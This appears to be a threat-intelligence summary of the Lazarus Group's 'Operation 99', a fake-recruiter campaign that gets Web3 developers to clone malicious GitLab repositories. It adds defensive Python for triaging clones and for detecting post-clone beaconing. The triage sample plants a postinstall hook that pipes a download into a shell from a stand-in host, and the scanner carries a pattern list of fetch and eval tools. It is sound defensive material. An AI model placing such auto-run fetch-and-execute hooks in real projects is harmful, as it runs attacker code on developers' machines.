Full Report
The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware. "The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat
Analysis Summary
# Threat Actor: Lazarus Group
## Attribution & Identity
**Attribution:** North Korea-linked.
**Known Aliases and Associated Groups:** The campaign follows the job-themed tactics previously observed in attacks such as Operation Dream Job (aka NukeSped).
## Activity Summary
The threat actor is conducting a new cyber attack campaign dubbed **Operation 99**. This operation specifically targets software developers seeking freelance work in the **Web3 and cryptocurrency** sectors. The scheme involves:
1. **Initial Approach:** Fake recruiters use deceptive profiles, primarily on **LinkedIn**, to engage developers.
2. **Luring:** Victims are lured with project tests and code reviews.
3. **Infection Vector:** Victims are directed to clone a malicious **GitLab repository**.
4. **Execution:** The cloned code connects to Command-and-Control (C2) servers, embedding malware into the victim's environment.
The end goal is to deploy data-stealing implants to extract sensitive information. The campaign was discovered on January 9, 2025.
## Tactics, Techniques & Procedures
- **Social Engineering:** Use of fake recruiters and deceptive LinkedIn profiles to initiate contact.
- **Spearphishing/Baiting:** Luring victims with job opportunities (freelance Web3/crypto work, project tests, code reviews).
- **Supply Chain Compromise (via Code Hosting):** Directing victims to clone malicious GitLab repositories whose code delivers malware once the project is cloned and run.
- **Command and Control (C2):** Cloned code connects to C2 servers to deliver further payloads.
- **Data Exfiltration:** Deploying implants designed to steal source code, secrets, and cryptocurrency wallet keys.
- [MITRE ATT&CK IDs are not explicitly provided in the source material.]
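The infection vector above turns on a developer running code from a repository they were told to clone. As an added example for this page (not code from the report or from the researchers it cites), the Python script below triages a fresh clone for anything that would execute on its own at install, build or editor-open time, which is the check worth doing before any build is run on a "take-home test". The files it looks at (`package.json` lifecycle scripts, `setup.py`, `.husky` hooks, a VS Code task with `runOn: folderOpen`), its pattern list and the sample repository that `build_sample_repo()` creates are all constructed assumptions.

```python
"""Triage a freshly cloned repository for code that runs on its own at
install, build or editor-open time, before anyone builds or runs it.
Added example, not code from the report. The files checked, the pattern
list and the sample clone from build_sample_repo() are constructed."""
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run during `npm install` without being invoked by name
NPM_AUTO_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
# Content that deserves a human look when it appears in an auto-run script
SUSPICIOUS = re.compile(r"(curl|wget|https?://|base64|eval\(|child_process|atob\()", re.I)


def _note(findings, path, reason, snippet=""):
    findings.append({"path": str(path), "reason": reason, "snippet": snippet[:120]})


def scan_package_json(path, findings):
    """Flag lifecycle scripts and suspicious content inside them."""
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (json.JSONDecodeError, OSError):
        _note(findings, path, "unparseable package.json")
        return
    for name, cmd in (data.get("scripts") or {}).items():
        if name in NPM_AUTO_SCRIPTS:
            _note(findings, path, f"auto-run npm script '{name}'", cmd)
            if SUSPICIOUS.search(cmd):
                _note(findings, path, f"suspicious content in '{name}'", cmd)


def scan_script_file(path, findings, reason):
    """Record a file that executes implicitly, plus its first suspicious line."""
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return
    _note(findings, path, reason)
    for line in text.splitlines():
        if SUSPICIOUS.search(line):
            _note(findings, path, "suspicious content", line.strip())
            break


def scan_vscode_tasks(path, findings):
    """A task with runOptions.runOn == 'folderOpen' starts when the folder is opened."""
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (json.JSONDecodeError, OSError):
        return  # JSON-with-comments is not handled here; treat as a manual check
    for task in data.get("tasks") or []:
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            _note(findings, path, "VS Code task auto-runs on folder open", str(task.get("command", "")))


def triage_repo(repo_dir):
    """Walk the clone and return findings; an empty list means nothing auto-runs."""
    findings = []
    root = Path(repo_dir)
    for path in sorted(root.rglob("*")):
        if ".git" in path.parts or not path.is_file():
            continue
        rel = path.relative_to(root).parts
        if path.name == "package.json":
            scan_package_json(path, findings)
        elif path.name == "setup.py":
            scan_script_file(path, findings, "setup.py runs on pip install")
        elif len(rel) == 2 and rel[0] == ".husky":
            scan_script_file(path, findings, "git hook script (husky)")
        elif rel == (".vscode", "tasks.json"):
            scan_vscode_tasks(path, findings)
    return findings


def build_sample_repo(base):
    """Constructed sample clone: benign README, a postinstall that pipes a
    download into a shell, and a VS Code task that runs on folder open."""
    base = Path(base)
    (base / "README.md").write_text("# Take-home test\n", encoding="utf-8")
    pkg = {"name": "take-home-test", "scripts": {
        "test": "jest", "postinstall": "curl -s https://example.invalid/setup.sh | sh"}}
    (base / "package.json").write_text(json.dumps(pkg), encoding="utf-8")
    (base / ".vscode").mkdir()
    tasks = {"version": "2.0.0", "tasks": [{"label": "bootstrap", "type": "shell",
             "command": "npm install", "runOptions": {"runOn": "folderOpen"}}]}
    (base / ".vscode" / "tasks.json").write_text(json.dumps(tasks), encoding="utf-8")
    return base


def demo_findings():
    """Build the sample clone in a temp dir and return what triage reports."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage_repo(build_sample_repo(tmp))


if __name__ == "__main__":
    for f in demo_findings():
        print(f"{f['path']}: {f['reason']}  {f['snippet']}")
```

Run it against a real clone with `triage_repo("/path/to/clone")`. A non-empty result is not proof of malice (plenty of honest projects use `prepare` hooks), but it is the list of things that must be read before `npm install`, `pip install` or opening the folder in an editor that trusts it; `npm install --ignore-scripts` and opening the folder in a disposable VM or container are the conservative follow-ups.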
## Targeting
**Sectors:** Software developers, specifically those seeking freelance **Web3 and cryptocurrency** work.
**Geography:** Victims identified globally, with a **significant concentration in Italy**. Smaller numbers of victims in Argentina, Brazil, Egypt, France, Germany, India, Indonesia, Mexico, Pakistan, the Philippines, the U.K., and the U.S.
**Victims:** Software developers globally.
## Tools & Infrastructure
**Malware Families Used:**
- Main5346 and its variant Main99 (downloader).
- Payload99/73 and the functionally similar Payload5346 (additional payloads delivered by Main99).
**Infrastructure (C2, domains, IPs):**
- Malicious GitLab repositories (used as the initial infection vector).
- Command-and-Control (C2) servers (implied destination for initial beaconing).
## Implications
Operation 99 highlights Lazarus Group's strategic shift towards financially motivated attacks targeting high-value crypto/Web3 development talent. By leveraging seemingly legitimate freelance recruitment via platforms like LinkedIn and weaponizing code repositories, the group bypasses traditional perimeter defenses and gains direct access to developer environments, increasing the risk of source code theft and credential compromise critical to the cryptocurrency ecosystem.
## Mitigations
- Exercise extreme caution when accepting project collaboration requests or cloning code/repositories from unknown or new sources, especially those originating from unsolicited recruitment contacts.
- Implement strict source control policies; scrutinize code from external repositories before integrating or running builds, even if purportedly for testing/review purposes.
- Harden development environments, ensuring source code, API keys, and cryptocurrency wallet secrets are segregated and protected with multi-factor authentication.
- Security teams should monitor for beaconing activity originating from development workstations that interact with unfamiliar or newly cloned git repositories.
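One way to act on the last mitigation, as an added example rather than detection content from the report: the Python below correlates `git clone` process events with the outbound connections that follow them from the same workstation, and raises an alert when a destination that the host had never contacted before, and that is not on an allowlist of expected code hosts and registries, is hit repeatedly inside a short window. The log format, host names, repository URLs, destination addresses, allowlist and thresholds are all constructed for the example.

```python
"""Correlate `git clone` process events on developer workstations with the
outbound connections that follow, to surface beacon-like traffic to
destinations the host never talked to before.
Added example, not detection content from the report. The log format,
hosts, repository URLs, destinations and allowlist are all constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telemetry in the shape of a flattened process + network export.
# kind=proc carries the command line; kind=net carries the destination host:port.
SAMPLE_LOG = """\
2025-01-09T10:00:02Z host=dev-ws-01 kind=proc cmd="git clone https://gitlab.example.invalid/web3-test/take-home.git"
2025-01-09T10:00:04Z host=dev-ws-01 kind=net dst=gitlab.example.invalid:443 proc=git
2025-01-09T10:01:40Z host=dev-ws-01 kind=proc cmd="npm install"
2025-01-09T10:01:55Z host=dev-ws-01 kind=net dst=registry.npmjs.org:443 proc=node
2025-01-09T10:02:10Z host=dev-ws-01 kind=net dst=203.0.113.77:8080 proc=node
2025-01-09T10:02:41Z host=dev-ws-01 kind=net dst=203.0.113.77:8080 proc=node
2025-01-09T10:03:12Z host=dev-ws-01 kind=net dst=203.0.113.77:8080 proc=node
2025-01-09T09:58:00Z host=dev-ws-02 kind=net dst=registry.npmjs.org:443 proc=node
2025-01-09T11:30:00Z host=dev-ws-02 kind=proc cmd="git clone git@github.example.invalid:corp/internal-lib.git"
2025-01-09T11:30:03Z host=dev-ws-02 kind=net dst=github.example.invalid:22 proc=ssh
"""

# Constructed allowlist of code hosts and package registries the org expects to see
KNOWN_GOOD = {"gitlab.example.invalid", "github.example.invalid", "registry.npmjs.org"}
WINDOW = timedelta(minutes=15)   # how long after the clone to keep watching
MIN_REPEATS = 3                  # repeated hits on one new destination look like a beacon

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) kind=(?P<kind>\S+) (?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line):
    """Turn one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
          "host": m["host"], "kind": m["kind"]}
    for key, quoted, bare in KV_RE.findall(m["rest"]):
        ev[key] = quoted or bare
    return ev


def clone_url(cmd):
    """Return the repository argument of a `git clone` command line, else None."""
    parts = cmd.split()
    if len(parts) >= 3 and parts[0] == "git" and parts[1] == "clone":
        return parts[-1]
    return None


def detect(log_text, known_good=KNOWN_GOOD, window=WINDOW, min_repeats=MIN_REPEATS):
    """For every clone, count post-clone connections to destinations that are neither
    allowlisted nor in the host's pre-clone baseline; alert on repeated ones."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    alerts = []
    for i, ev in enumerate(events):
        if ev["kind"] != "proc":
            continue
        url = clone_url(ev.get("cmd", ""))
        if not url:
            continue
        # Destinations this host reached before the clone are its baseline
        baseline = {e["dst"].rsplit(":", 1)[0] for e in events[:i]
                    if e["kind"] == "net" and e["host"] == ev["host"]}
        counts = defaultdict(int)
        for e in events[i + 1:]:
            if e["ts"] - ev["ts"] > window:
                break               # events are sorted, so nothing later is in range
            if e["host"] != ev["host"] or e["kind"] != "net":
                continue
            dst_host = e["dst"].rsplit(":", 1)[0]
            if dst_host not in known_good and dst_host not in baseline:
                counts[e["dst"]] += 1
        for dst, n in counts.items():
            if n >= min_repeats:
                alerts.append({"host": ev["host"], "repo": url, "dst": dst,
                               "connections": n, "clone_at": ev["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['host']}: {a['connections']} connections to {a['dst']} "
              f"within {WINDOW} of cloning {a['repo']} at {a['clone_at']}")
```

On the constructed log this flags `dev-ws-01` for three connections to a new `203.0.113.77:8080` shortly after cloning the "take-home" repository, and stays quiet for `dev-ws-02`, whose only post-clone traffic goes to an allowlisted host. In practice the baseline should be built from weeks of history rather than the lines preceding the clone, the window and repeat threshold need tuning to the environment, and the alert is a reason to pull the clone for triage, not a verdict on its own.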